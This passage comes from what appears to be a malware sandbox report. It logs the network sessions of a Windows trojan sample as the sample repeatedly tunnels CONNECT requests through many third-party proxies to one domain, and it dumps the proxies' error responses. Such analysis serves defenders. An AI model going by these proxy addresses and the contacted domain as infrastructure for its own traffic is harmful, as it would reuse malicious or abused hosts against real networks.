                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.054568052 CET334INHTTP/1.1 400 Bad Request
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 204
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                551192.168.2.85175660.188.102.225180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.725064993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.491767883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.695493937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.992031097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                552192.168.2.851843199.188.93.21490005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.725872040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                553192.168.2.851830196.20.125.13380835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.726885080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                554192.168.2.851845141.94.174.6402805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.734935045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.194884062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.695135117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                555192.168.2.85177636.111.143.8157775828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.745754004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                556192.168.2.849977220.194.189.14431285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.755014896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:56.237421036 CET317INHTTP/1.1 502 Bad Gateway
                                                                                Server: ZZY_WEB/20.08.18
                                                                                Date: Fri, 23 Feb 2024 13:51:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 161
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 5a 5a 59 5f 57 45 42 2f 32 30 2e 30 38 2e 31 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>ZZY_WEB/20.08.18</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                557192.168.2.851780210.211.113.36805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.769218922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                558192.168.2.851420125.229.149.168651005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.773925066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.847546101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.898264885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.991869926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                559192.168.2.851850162.214.102.195567555828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.810267925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.382345915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882687092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.882605076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                560192.168.2.85185684.39.112.14431285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.816266060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                561192.168.2.851800221.230.7.3990005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.824564934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.694859028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                562192.168.2.851874104.17.62.87805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.840285063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.928124905 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                563192.168.2.851876104.18.251.208805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.849980116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.937864065 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                564192.168.2.8502508.242.176.379995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.850461960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.882527113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.882781029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.882810116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                565192.168.2.85149627.65.30.3710805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.850619078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                566192.168.2.851824152.32.187.16481185828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.850691080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.338809013 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                567192.168.2.85181443.131.245.216156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.850716114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                568192.168.2.85186472.210.252.134461645828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.850718975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                569192.168.2.850046203.19.38.11410805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.865571022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.991769075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.049463034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.185971022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.554466963 CET309INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.22.0
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                570192.168.2.851499207.180.198.241601485828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.870955944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.991666079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.049457073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.185986042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                571192.168.2.850230147.45.40.15315545828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.947938919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                572192.168.2.850261161.97.170.209165215828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.949520111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.991796970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                573192.168.2.851860211.222.252.187805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.950906992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                574192.168.2.85030185.187.151.27300165828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.952044010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.991796970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.992002010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.992260933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                575192.168.2.851853188.166.230.38168135828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.987802029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.694901943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.695605993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.679781914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.679708004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.695067883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.695341110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                576192.168.2.851896172.67.231.3805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.991890907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.084117889 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                577192.168.2.851848103.231.78.36805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.992222071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                578192.168.2.851862115.74.158.4010805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.013108969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                579192.168.2.851869211.222.252.18781935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.013443947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                580192.168.2.85189372.210.221.19741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.024343967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                581192.168.2.85152141.74.91.244805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
